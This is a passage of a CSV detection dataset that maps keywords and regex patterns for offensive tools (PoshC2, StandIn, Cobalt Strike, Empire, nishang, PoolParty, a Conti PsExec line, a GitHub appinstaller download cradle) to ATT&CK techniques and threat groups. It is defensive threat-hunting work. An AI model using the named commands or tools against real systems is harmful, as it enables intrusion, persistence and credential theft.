"*standin --asrep*",".{0,1000}standin\s\-\-asrep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60273"
"*standin --dc*",".{0,1000}standin\s\-\-dc.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60274"
"*standin --delegation*",".{0,1000}standin\s\-\-delegation.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60275"
"*standin --group *Domain Admins*",".{0,1000}standin\s\-\-group\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60276"
"*standin --object *",".{0,1000}standin\s\-\-object\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60277"
"*standin --spn*",".{0,1000}standin\s\-\-spn.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60278"
"*StandIn.exe --*",".{0,1000}StandIn\.exe\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60279"
"*StandIn.exe"" --*",".{0,1000}StandIn\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60280"
"*StandIn_v12_Net35_45.zip*",".{0,1000}StandIn_v12_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60281"
"*StandIn_v13_Net35_45.zip*",".{0,1000}StandIn_v13_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60282"
"*Stardust.Win32.NtProtectVirtualMemory(*",".{0,1000}Stardust\.Win32\.NtProtectVirtualMemory\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60286"
"*Stardust.Win32.RtlAllocateHeap(*",".{0,1000}Stardust\.Win32\.RtlAllocateHeap\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60287"
"*STARDUST_MACROS_H*",".{0,1000}STARDUST_MACROS_H.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60288"
"*stardust50578/rdp_brute*",".{0,1000}stardust50578\/rdp_brute.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","60289"
"*StarfireLab/SharpWeb*",".{0,1000}StarfireLab\/SharpWeb.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","60290"
"*Staring Nemesis Bot. Teamserver*",".{0,1000}Staring\sNemesis\sBot\.\sTeamserver.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","60291"
"*StarkillerSnackbar.vue*",".{0,1000}StarkillerSnackbar\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","60292"
"*staroffice2john.py*",".{0,1000}staroffice2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60293"
"*Start Menu\Programs\Startup\Loader.exe*",".{0,1000}Start\sMenu\\Programs\\Startup\\Loader\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","60297"
"*start ms-appinstaller://?source=https://raw.githubusercontent.com*",".{0,1000}start\sms\-appinstaller\:\/\/\?source\=https\:\/\/raw\.githubusercontent\.com.{0,1000}","offensive_tool_keyword","ms-appinstaller","download cradle with appinstaller from github","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","lolbin","10","10","N/A","N/A","N/A","N/A","60298"
"*start PsExec.exe -d *",".{0,1000}start\sPsExec\.exe\s\-d\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60299"
"*start stinger ",".{0,1000}start\sstinger\s","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","0","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60300"
"*Start the Tor2web proxy*",".{0,1000}Start\sthe\sTor2web\sproxy.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","60301"
"*'start/stop iptables port reuse'*",".{0,1000}\'start\/stop\siptables\sport\sreuse\'.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","60303"
"*start_mythic_server.sh*",".{0,1000}start_mythic_server\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","60304"
"*start_nbnsspoof*",".{0,1000}start_nbnsspoof.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","60305"
"*start_phpsploit_connected.sh*",".{0,1000}start_phpsploit_connected\.sh.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","60306"
"*Start-ACLsAnalysis -Domain*",".{0,1000}Start\-ACLsAnalysis\s\-Domain.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60310"
"*startanotherimplant*",".{0,1000}startanotherimplant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60311"
"*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","60312"
"*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","60313"
"*startdaisy*",".{0,1000}startdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60314"
"*Start-DLLScan *",".{0,1000}Start\-DLLScan\s.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","60315"
"*Start-domainACLsAnalysis*",".{0,1000}Start\-domainACLsAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60316"
"*Started spying using MyAutomationEventHandler*",".{0,1000}Started\sspying\susing\sMyAutomationEventHandler.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","60317"
"*Starting AddUserToAdminGroup for user:*",".{0,1000}Starting\sAddUserToAdminGroup\sfor\suser\:.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","60318"
"*Starting AutoPwnKey Port Scanner at*",".{0,1000}Starting\sAutoPwnKey\sPort\sScanner\sat.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","60319"
"*Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits*",".{0,1000}Starting\sBrowser\sAutopwn\swith\sAdobe\sFlash\-only\sBrowserExploitServer\-based\sexploits.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#content","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","60320"
"*Starting bruteforce attack on *",".{0,1000}Starting\sbruteforce\sattack\son\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#content","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","60321"
"*Starting CcmExec service. Wait around 30 seconds for SCNotification.exe to run config file*",".{0,1000}Starting\sCcmExec\sservice\.\sWait\saround\s30\sseconds\sfor\sSCNotification\.exe\sto\srun\sconfig\sfile.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","60322"
"*Starting DLL sideloading vulnerability scan*",".{0,1000}Starting\sDLL\ssideloading\svulnerability\sscan.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","60323"
"*Starting enumerating file shares using domain credential for *",".{0,1000}Starting\senumerating\sfile\sshares\susing\sdomain\scredential\sfor\s.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","#content","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","60324"
"*Starting HVNC Server*",".{0,1000}Starting\sHVNC\sServer.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#content","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","60325"
"*Starting keylogger for *",".{0,1000}Starting\skeylogger\sfor\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","60326"
"*starting Multi-Layered ACLight scan*",".{0,1000}starting\sMulti\-Layered\sACLight\sscan.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","#content","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60327"
"*Starting NBNS spoofer*",".{0,1000}Starting\sNBNS\sspoofer.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","60328"
"*STARTING OBFUSCATED DECODER TESTS *",".{0,1000}STARTING\sOBFUSCATED\sDECODER\sTESTS\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","60329"
"*Starting php server at localhost:*",".{0,1000}Starting\sphp\sserver\sat\slocalhost\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#content","N/A","10","","N/A","","","","60330"
"*Starting PoolParty attack against process id: *",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","60331"
